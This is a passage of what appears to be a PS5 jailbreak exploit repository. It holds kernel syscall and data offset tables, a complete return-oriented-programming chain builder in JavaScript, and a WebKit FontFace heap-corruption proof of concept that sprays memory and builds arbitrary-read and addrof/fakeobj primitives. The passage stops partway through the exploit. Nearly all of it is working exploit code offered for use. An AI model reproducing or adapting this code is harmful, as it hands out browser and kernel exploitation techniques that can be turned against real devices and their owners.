228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8AB5;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318AB5;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF18AB5; //check
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/rop.js:
--------------------------------------------------------------------------------
1 | class rop {
2 |
3 | constructor(stack_size = 0x80000, reserved_stack = 0x10000) {
4 | this.stack_size = stack_size;
5 | this.reserved_stack = reserved_stack;
6 | this.stack_dwords = stack_size / 0x4;
7 | this.reserved_stack_index = this.reserved_stack / 0x4;
8 |
9 | this.stack_memory = p.malloc(this.stack_dwords + 0x2 + 0x200);
10 | this.stack_array = this.stack_memory.backing;
11 | this.stack_entry_point = this.stack_memory.add32(this.reserved_stack);
12 | this.return_value = this.stack_memory.add32(this.stack_size);
13 | this.initial_count = 0;
14 | this.count = 0;
15 |
16 | this.branches = this.return_value.add32(0x8);
17 | this.branches_count = 0;
18 |
19 | this.branch_types = {
20 | EQUAL: 0x314500,
21 | ABOVE: 0x314501,
22 | BELOW: 0x314502,
23 | GREATER: 0x314503,
24 | LESSER: 0x314504,
25 | };
26 |
27 | }
28 |
29 | set_initial_count(count) {
30 | this.initial_count = count;
31 | if (this.count == 0) {
32 | this.count = this.initial_count;
33 | }
34 | }
35 |
36 | clear() {
37 | this.count = this.initial_count;
38 | this.branches_count = 0;
39 | for (let i = 0; i < this.stack_dwords; i++) {
40 | this.stack_array[i] = 0x0;
41 | }
42 | }
43 |
44 | increment_stack() {
45 | return this.count++;
46 | }
47 |
48 | set_entry(index, value) {
49 | if (value instanceof int64) {
50 | this.stack_array[this.reserved_stack_index + index * 2] = value.low;
51 | this.stack_array[this.reserved_stack_index + index * 2 + 1] = value.hi;
52 | } else if (typeof (value) == 'number') {
53 | this.stack_array[this.reserved_stack_index + index * 2] = value;
54 | this.stack_array[this.reserved_stack_index + index * 2 + 1] = 0x0;
55 | if (value > 0xFFFFFFFF) {
56 | alert("you're trying to write a value exceeding 32-bits without using a int64 instance");
57 | }
58 | } else {
59 | alert("You're trying to write a non number/non int64 value?");
60 | }
61 | }
62 |
63 | /**
64 | * performs `*rsp = value; rsp += 8;`
65 | */
66 | push(value) {
67 | this.set_entry(this.increment_stack(), value);
68 | }
69 |
70 | /**
71 | * performs `*dest = value;` in chain
72 | */
73 | push_write4(dest, value) {
74 | this.push(gadgets["pop rdi"]);
75 | this.push(dest);
76 | this.push(gadgets["pop rax"]);
77 | this.push(value);
78 | this.push(gadgets["mov [rdi], eax"]);
79 | }
80 |
81 | /**
82 | * performs `*dest = value;` in chain
83 | */
84 | push_write8(dest, value) {
85 | this.push(gadgets["pop rdi"]);
86 | this.push(dest);
87 | this.push(gadgets["pop rsi"]);
88 | this.push(value);
89 | this.push(gadgets["mov [rdi], rsi"]);
90 | }
91 |
92 | /**
93 | * performs `*dest = rax;` in chain
94 | */
95 | write_result(dest) {
96 | this.push(gadgets["pop rdi"]);
97 | this.push(dest);
98 | this.push(gadgets["mov [rdi], rax"]);
99 | }
100 |
101 | /**
102 | * performs `*dest = eax;` in chain
103 | */
104 | write_result4(dest) {
105 | this.push(gadgets["pop rdi"]);
106 | this.push(dest);
107 | this.push(gadgets["mov [rdi], eax"]);
108 | }
109 |
110 | /**
111 | * pushes rdi-r9 args on the stack for sysv calls
112 | */
113 | push_sysv(rdi, rsi, rdx, rcx, r8, r9) {
114 |
115 | if (rdi != undefined) {
116 | this.push(gadgets["pop rdi"]);
117 | this.push(rdi);
118 | }
119 |
120 | if (rsi != undefined) {
121 | this.push(gadgets["pop rsi"]);
122 | this.push(rsi);
123 | }
124 |
125 | if (rdx != undefined) {
126 | this.push(gadgets["pop rdx"]);
127 | this.push(rdx);
128 | }
129 |
130 | if (rcx != undefined) {
131 | this.push(gadgets["pop rcx"]);
132 | this.push(rcx);
133 | }
134 |
135 | if (r8 != undefined) {
136 | this.push(gadgets["pop r8"]);
137 | this.push(r8);
138 | }
139 |
140 | if (r9 != undefined) {
141 | this.push(gadgets["pop r9"]);
142 | this.push(r9);
143 | }
144 |
145 | }
146 |
147 | /**
148 | * helper function to add a standard sysv call to the chain.
149 | */
150 | fcall(rip, rdi, rsi, rdx, rcx, r8, r9) {
151 | this.push_sysv(rdi, rsi, rdx, rcx, r8, r9);
152 | if (this.stack_entry_point.add32(this.count * 0x8).low & 0x8) {
153 | this.push(gadgets["ret"]);
154 | }
155 | this.push(rip);
156 | }
157 |
158 | /**
159 | * returns the current stack pointer.
160 | */
161 | get_rsp() {
162 | return this.stack_entry_point.add32(this.count * 0x8);
163 | }
164 |
165 | /**
166 | * performs `rsp = dest;` in chain.
167 | * can be used to 'jump' to different parts of a rop chain
168 | */
169 | jmp_to_rsp(dest) {
170 | this.push(gadgets["pop rsp"]);
171 | this.push(dest);
172 | }
173 |
174 | /**
175 | * function intended to build a reusable 'syscall' chain.
176 | * Having a syscall return an error makes the stub perform a push rax, a call and a push rbp, this would usually corrupt the rop chain for later reuse
177 | */
178 | self_healing_syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
179 | this.push_sysv(rdi, rsi, rdx, rcx, r8, r9);
180 | let restore_point = this.get_rsp();
181 | this.push(gadgets["ret"]);
182 | this.push(gadgets["ret"]);
183 | this.push(gadgets["ret"]);
184 |
185 | if (this.stack_entry_point.add32(this.count * 0x8).low & 0x8) {
186 | this.push(gadgets["ret"]);
187 | restore_point.add32inplace(0x8);
188 | }
189 | this.push(syscalls[sysc]);
190 | this.push_write8(restore_point, gadgets["ret"]);
191 | this.push_write8(restore_point.add32(0x08), gadgets["ret"]);
192 | this.push_write8(restore_point.add32(0x10), gadgets["ret"]);
193 | this.push_write8(restore_point.add32(0x18), syscalls[sysc]);
194 |
195 | }
196 |
197 | /**
198 | * performs `*dest = *dest + value;` in chain
199 | */
200 | push_inc8(dest, value) {
201 | this.push(gadgets["pop rdi"]);
202 | this.push(dest);
203 | this.push(gadgets["pop rax"]);
204 | this.push(dest);
205 | this.push(gadgets["mov rax, [rax]"]);
206 | this.push(gadgets["pop rdx"]);
207 | this.push(value);
208 | this.push(gadgets["add rax, rdx"]);
209 | this.push(gadgets["mov [rdi], rax"]);
210 | }
211 |
212 | /**
213 | * returns the next available branch
214 | */
215 | get_branch() {
216 | return this.branches.add32(this.branches_count++ * 0x10);
217 | }
218 |
219 | /**
220 | * prepares a branch in the rop chain, for 32b comparisons on [addr] <-> compare value
221 | * use branch_types.XXXXX as type argument.
222 | * returns a ptr ptr for the branchpoints
223 | * use logical inversions for other jmp types. setne -> inverted sete, setbe -> inverted seta, ...
224 | */
225 | create_branch(type, value_address, compare_value) {
226 | let branch_addr = this.get_branch();
227 |
228 | this.push(gadgets["pop rcx"]);
229 | this.push(value_address);
230 | this.push(gadgets["pop rax"]);
231 | this.push(compare_value);
232 | this.push(gadgets["cmp [rcx], eax"]);
233 | this.push(gadgets["pop rax"]);
234 | this.push(0);
235 |
236 | if (type == this.branch_types.EQUAL) {
237 | this.push(gadgets["sete al"]);
238 | } else if (type == this.branch_types.ABOVE) {
239 | this.push(gadgets["seta al"]);
240 | } else if (type == this.branch_types.BELOW) {
241 | this.push(gadgets["setb al"]);
242 | } else if (type == this.branch_types.GREATER) {
243 | this.push(gadgets["setg al"]);
244 | } else if (type == this.branch_types.LESSER) {
245 | this.push(gadgets["setl al"]);
246 | } else {
247 | alert("illegal branch type.");
248 | }
249 |
250 | this.push(gadgets["shl rax, 3"]);
251 | this.push(gadgets["pop rdx"]);
252 | this.push(branch_addr);
253 | this.push(gadgets["add rax, rdx"]);
254 | this.push(gadgets["mov rax, [rax]"]);
255 | this.push(gadgets["pop rdi"]);
256 | let branch_pointer_pointer_idx = this.increment_stack();
257 | this.push(gadgets["mov [rdi], rax"]);
258 | this.push(gadgets["pop rsp"]);
259 | let branch_pointer = this.get_rsp();
260 | this.increment_stack();
261 |
262 | this.set_entry(branch_pointer_pointer_idx, branch_pointer);
263 |
264 | return branch_addr;
265 | }
266 |
267 | /**
268 | * finalizes a branch by setting the destination stack pointers.
269 | * swap met and not met args if trying for an inverted jmp type.
270 | */
271 | set_branch_points(branch_addr, rsp_condition_met, rsp_condition_not_met) {
272 | p.write8(branch_addr.add32(0x0), rsp_condition_not_met);
273 | p.write8(branch_addr.add32(0x8), rsp_condition_met);
274 | }
275 |
276 | /**
277 | * performs (*address)++; in chain
278 | */
279 | increment_dword(address) {
280 | this.push(gadgets["pop rax"]);
281 | this.push(address);
282 | this.push(gadgets["inc dword [rax]"]);
283 | }
284 | }
285 |
286 | //extension of the generic rop class intended to be used with the hijacked worker thread.
287 | class worker_rop extends rop {
288 |
289 | constructor(stack_size, reserved_stack) {
290 | super(stack_size, reserved_stack);
291 | p.pre_chain(this);
292 | }
293 |
294 | clear() {
295 | super.clear();
296 | p.pre_chain(this);
297 | }
298 |
299 | async call(rip, rdi, rsi, rdx, rcx, r8, r9) {
300 | this.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
301 | this.write_result(this.return_value);
302 | await this.run();
303 | return p.read8(this.return_value);
304 | }
305 |
306 | async syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
307 | return await this.call(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
308 | }
309 |
310 | async add_syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
311 | this.fcall(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
312 | }
313 |
314 | async add_syscall_ret(retstore, sysc, rdi, rsi, rdx, rcx, r8, r9) {
315 | this.fcall(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
316 | this.write_result(retstore);
317 | }
318 |
319 | async run() {
320 | await p.launch_chain(this);
321 | this.clear();
322 | }
323 | }
324 |
325 | class thread_rop extends rop {
326 | constructor(name = "rop_thread", stack_size, reserved_stack) {
327 | super(stack_size, reserved_stack);
328 | //we longjmp into the ropchain, longjmp overites the first entry stack entry with its own saved 'return address' this requires us to skip an entry.
329 | this.set_initial_count(1);
330 |
331 | //prepare lonjmp context
332 | p.write8(this.stack_memory, gadgets["ret"]); //ret address
333 | p.write8(this.stack_memory.add32(0x08), 0x0); //rbx
334 | p.write8(this.stack_memory.add32(0x10), this.stack_entry_point); //rsp
335 | p.write8(this.stack_memory.add32(0x18), 0x0); //rbp
336 | p.write8(this.stack_memory.add32(0x20), 0x0); //r12
337 | p.write8(this.stack_memory.add32(0x28), 0x0); //r13
338 | p.write8(this.stack_memory.add32(0x30), 0x0); //r14
339 | p.write8(this.stack_memory.add32(0x38), 0x0); //r15
340 | p.write4(this.stack_memory.add32(0x40), 0x37F); //fpu control word
341 | p.write4(this.stack_memory.add32(0x44), 0x9FE0); //mxcsr
342 |
343 | p.writestr(this.stack_memory.add32(0x50), name); //thr name
344 | }
345 |
346 | /**
347 | * returns created pthread_t as int64
348 | */
349 | async spawn_thread() {
350 |
351 | //add pthread_exit((void*)0x44414544); -> "DEAD"
352 | this.fcall(libKernelBase.add32(OFFSET_lk_pthread_exit), 0x44414544);
353 |
354 | await chain.call(libKernelBase.add32(OFFSET_lk_pthread_create_name_np), this.stack_memory.add32(0x48), 0x0, libSceLibcInternalBase.add32(OFFSET_lc_longjmp), this.stack_memory, this.stack_memory.add32(0x50));
355 | return p.read8(this.stack_memory.add32(0x48));
356 | }
357 | }
--------------------------------------------------------------------------------
/document/en/ps5/rop_slave.js:
--------------------------------------------------------------------------------
1 | let my_worker = this;
2 |
3 | self.onmessage = function (event) {
4 | event.ports[0].postMessage(1);
5 | }
--------------------------------------------------------------------------------
/document/en/ps5/webkit.js:
--------------------------------------------------------------------------------
1 | var PAGE_SIZE = 16384;
2 | var SIZEOF_CSS_FONT_FACE = 0xb8;
3 | var HASHMAP_BUCKET = 208;
4 | var STRING_OFFSET = 20;
5 | var SPRAY_FONTS = 0x100A;
6 | var GUESS_FONT = 0x200430000;
7 | var NPAGES = 20;
8 | var INVALID_POINTER = 0;
9 | var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)
10 | var HAMMER_NSTRINGS = 700; //tweak this if crashing during hammer time
11 |
12 | function hex(n) {
13 | if ((typeof n) != "number")
14 | return "" + n;
15 | return "0x" + (new Number(n)).toString(16);
16 | }
17 |
18 | function poc() {
19 |
20 | var union = new ArrayBuffer(8);
21 | var union_b = new Uint8Array(union);
22 | var union_i = new Uint32Array(union);
23 | var union_f = new Float64Array(union);
24 |
25 | var bad_fonts = [];
26 |
27 | for (var i = 0; i < SPRAY_FONTS; i++)
28 | bad_fonts.push(new FontFace("font1", "", {}));
29 |
30 | var good_font = new FontFace("font2", "url(data:text/html,)", {});
31 | bad_fonts.push(good_font);
32 |
33 | var arrays = [];
34 | for (var i = 0; i < 512; i++)
35 | arrays.push(new Array(31));
36 |
37 | arrays[256][0] = 1.5;
38 | arrays[257][0] = {};
39 | arrays[258][0] = 1.5;
40 |
41 | var jsvalue = {
42 | a: arrays[256],
43 | b: new Uint32Array(1),
44 | c: true
45 | };
46 |
47 | var string_atomifier = {};
48 | var string_id = 10000000;
49 |
50 | function ptrToString(p) {
51 | var s = '';
52 | for (var i = 0; i < 8; i++) {
53 | s += String.fromCharCode(p % 256);
54 | p = (p - p % 256) / 256;
55 | }
56 | return s;
57 | }
58 |
59 | function stringToPtr(p, o) {
60 | if (o === undefined)
61 | o = 0;
62 | var ans = 0;
63 | for (var i = 7; i >= 0; i--)
64 | ans = 256 * ans + p.charCodeAt(o + i);
65 | return ans;
66 | }
67 |
68 | var strings = [];
69 |
70 | function mkString(l, head) {
71 | var s = head + '\u0000'.repeat(l - STRING_OFFSET - 8 - head.length) + (string_id++);
72 | string_atomifier[s] = 1;
73 | strings.push(s);
74 | return s;
75 | }
76 |
77 | var guf = GUESS_FONT;
78 | var ite = true;
79 | var matches = 0;
80 |
81 | var round = 0;
82 |
83 | window.ffses = {};
84 |
85 | do {
86 |
87 | var p_s = ptrToString(NPAGES + 2); // vector.size()
88 | for (var i = 0; i < NPAGES; i++)
89 | p_s += ptrToString(guf + i * PAGE_SIZE);
90 | p_s += ptrToString(INVALID_POINTER);
91 |
92 | for (var i = 0; i < 256; i++)
93 | mkString(HASHMAP_BUCKET, p_s);
94 |
95 | var ffs = ffses["search_" + (++round)] = new FontFaceSet(bad_fonts);
96 |
97 | var badstr1 = mkString(HASHMAP_BUCKET, p_s);
98 |
99 | var guessed_font = null;
100 | var guessed_addr = null;
101 |
102 | for (var i = 0; i < SPRAY_FONTS; i++) {
103 | bad_fonts[i].family = "search" + round;
104 | if (badstr1.substr(0, p_s.length) != p_s) {
105 | guessed_font = i;
106 | var p_s1 = badstr1.substr(0, p_s.length);
107 | for (var i = 1; i <= NPAGES; i++) {
108 | if (p_s1.substr(i * 8, 8) != p_s.substr(i * 8, 8)) {
109 | guessed_addr = stringToPtr(p_s.substr(i * 8, 8));
110 | break;
111 | }
112 | }
113 | if (matches++ == 0) {
114 | guf = guessed_addr + 2 * PAGE_SIZE;
115 | guessed_addr = null;
116 | }
117 | break;
118 | }
119 | }
120 |
121 | if ((ite = !ite))
122 | guf += NPAGES * PAGE_SIZE;
123 |
124 | }
125 | while (guessed_addr === null);
126 |
127 | var p_s = '';
128 | p_s += ptrToString(26);
129 | p_s += ptrToString(guessed_addr);
130 | p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
131 | for (var i = 0; i < 19; i++)
132 | p_s += ptrToString(INVALID_POINTER);
133 |
134 | for (var i = 0; i < 256; i++)
135 | mkString(HASHMAP_BUCKET, p_s);
136 |
137 | var needfix = [];
138 | for (var i = 0;; i++) {
139 | ffses["ffs_leak_" + i] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font + 1], good_font]);
140 | var badstr2 = mkString(HASHMAP_BUCKET, p_s);
141 | needfix.push(mkString(HASHMAP_BUCKET, p_s));
142 | bad_fonts[guessed_font].family = "evil2";
143 | bad_fonts[guessed_font + 1].family = "evil3";
144 | var leak = stringToPtr(badstr2.substr(badstr2.length - 8));
145 | if (leak < 0x1000000000000)
146 | break;
147 | }
148 |
149 | function makeReader(read_addr, ffs_name) {
150 | var fake_s = '';
151 | fake_s += '0000'; //padding for 8-byte alignment
152 | fake_s += '\u00ff\u0000\u0000\u0000\u00ff\u00ff\u00ff\u00ff'; //refcount=255, length=0xffffffff
153 | fake_s += ptrToString(read_addr); //where to read from
154 | fake_s += ptrToString(0x80000014); //some fake non-zero hash, atom, 8-bit
155 | p_s = '';
156 | p_s += ptrToString(29);
157 | p_s += ptrToString(guessed_addr);
158 | p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
159 | p_s += ptrToString(guessed_addr + 2 * SIZEOF_CSS_FONT_FACE);
160 | for (var i = 0; i < 18; i++)
161 | p_s += ptrToString(INVALID_POINTER);
162 | for (var i = 0; i < 256; i++)
163 | mkString(HASHMAP_BUCKET, p_s);
164 | var the_ffs = ffses[ffs_name] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font + 1], bad_fonts[guessed_font + 2], good_font]);
165 | mkString(HASHMAP_BUCKET, p_s);
166 | var relative_read = mkString(HASHMAP_BUCKET, fake_s);
167 | bad_fonts[guessed_font].family = ffs_name + "_evil1";
168 | bad_fonts[guessed_font + 1].family = ffs_name + "_evil2";
169 | bad_fonts[guessed_font + 2].family = ffs_name + "_evil3";
170 | needfix.push(relative_read);
171 | if (relative_read.length < 1000) //failed
172 | return makeReader(read_addr, ffs_name + '_');
173 | return relative_read;
174 | }
175 |
176 | var fastmalloc = makeReader(leak, 'ffs3'); //read from leaked string ptr
177 |
178 | for (var i = 0; i < 100000; i++)
179 | mkString(128, '');
180 |
181 | var props = [];
182 | for (var i = 0; i < 0x10000; i++) {
183 | props.push({
184 | value: 0x41434442
185 | });
186 | props.push({
187 | value: jsvalue
188 | });
189 | }
190 |
191 | var jsvalue_leak = null;
192 |
193 | while (jsvalue_leak === null) {
194 | Object.defineProperties({}, props);
195 | for (var i = 0;; i++) {
196 | if (fastmalloc.charCodeAt(i) == 0x42 &&
197 | fastmalloc.charCodeAt(i + 1) == 0x44 &&
198 | fastmalloc.charCodeAt(i + 2) == 0x43 &&
199 | fastmalloc.charCodeAt(i + 3) == 0x41 &&
200 | fastmalloc.charCodeAt(i + 4) == 0 &&
201 | fastmalloc.charCodeAt(i + 5) == 0 &&
202 | fastmalloc.charCodeAt(i + 6) == 254 &&
203 | fastmalloc.charCodeAt(i + 7) == 255 &&
204 | fastmalloc.charCodeAt(i + 24) == 14
205 | ) {
206 | jsvalue_leak = stringToPtr(fastmalloc, i + 32);
207 | break;
208 | }
209 | }
210 | }
211 |
212 | var rd_leak = makeReader(jsvalue_leak, 'ffs4');
213 | var array256 = stringToPtr(rd_leak, 16); //arrays[256]
214 | var ui32a = stringToPtr(rd_leak, 24); //Uint32Array
215 |
216 | var rd_arr = makeReader(array256, 'ffs5');
217 | var butterfly = stringToPtr(rd_arr, 8);
218 |
219 | var rd_ui32 = makeReader(ui32a, 'ffs6');
220 | for (var i = 0; i < 8; i++)
221 | union_b[i] = rd_ui32.charCodeAt(i);
222 |
223 | var structureid_low = union_i[0];
224 | var structureid_high = union_i[1];
225 |
226 | //setup for addrof/fakeobj
227 | //in array[256] butterfly: 0 = &bad_fonts[guessed_font+12] as double
228 | //in array[257] butterfly: 0 = {0x10000, 0x10000} as jsvalue
229 | union_i[0] = 0x10000;
230 | union_i[1] = 0; //account for nan-boxing
231 | arrays[257][1] = {}; //force it to still be jsvalue-array not double-array
232 | arrays[257][0] = union_f[0];
233 | union_i[0] = (guessed_addr + 12 * SIZEOF_CSS_FONT_FACE) | 0;
234 | union_i[1] = (guessed_addr - guessed_addr % 0x100000000) / 0x100000000;
235 | arrays[256][i] = union_f[0];
236 |
237 | //hammer time!
238 |
239 | pp_s = '';
240 | pp_s += ptrToString(56);
241 | for (var i = 0; i < 12; i++)
242 | pp_s += ptrToString(guessed_addr + i * SIZEOF_CSS_FONT_FACE);
243 |
244 | var fake_s = '';
245 | fake_s += '0000'; //padding for 8-byte alignment
246 | fake_s += ptrToString(INVALID_POINTER); //never dereferenced
247 | fake_s += ptrToString(butterfly); //hammer target
248 | fake_s += '\u0000\u0000\u0000\u0000\u0022\u0000\u0000\u0000'; //length=34
249 |
250 | var ffs7_args = [];
251 | for (var i = 0; i < 12; i++)
252 | ffs7_args.push(bad_fonts[guessed_font + i]);
253 | ffs7_args.push(good_font);
254 |
255 | var ffs8_args = [bad_fonts[guessed_font + 12]];
256 | for (var i = 0; i < 5; i++)
257 | ffs8_args.push(new FontFace(HAMMER_FONT_NAME, "url(data:text/html,)", {}));
258 |
259 | for (var i = 0; i < HAMMER_NSTRINGS; i++)
260 | mkString(HASHMAP_BUCKET, pp_s);
261 |
262 | ffses.ffs7 = new FontFaceSet(ffs7_args);
263 | mkString(HASHMAP_BUCKET, pp_s);
264 | ffses.ffs8 = new FontFaceSet(ffs8_args);
265 | var post_ffs = mkString(HASHMAP_BUCKET, fake_s);
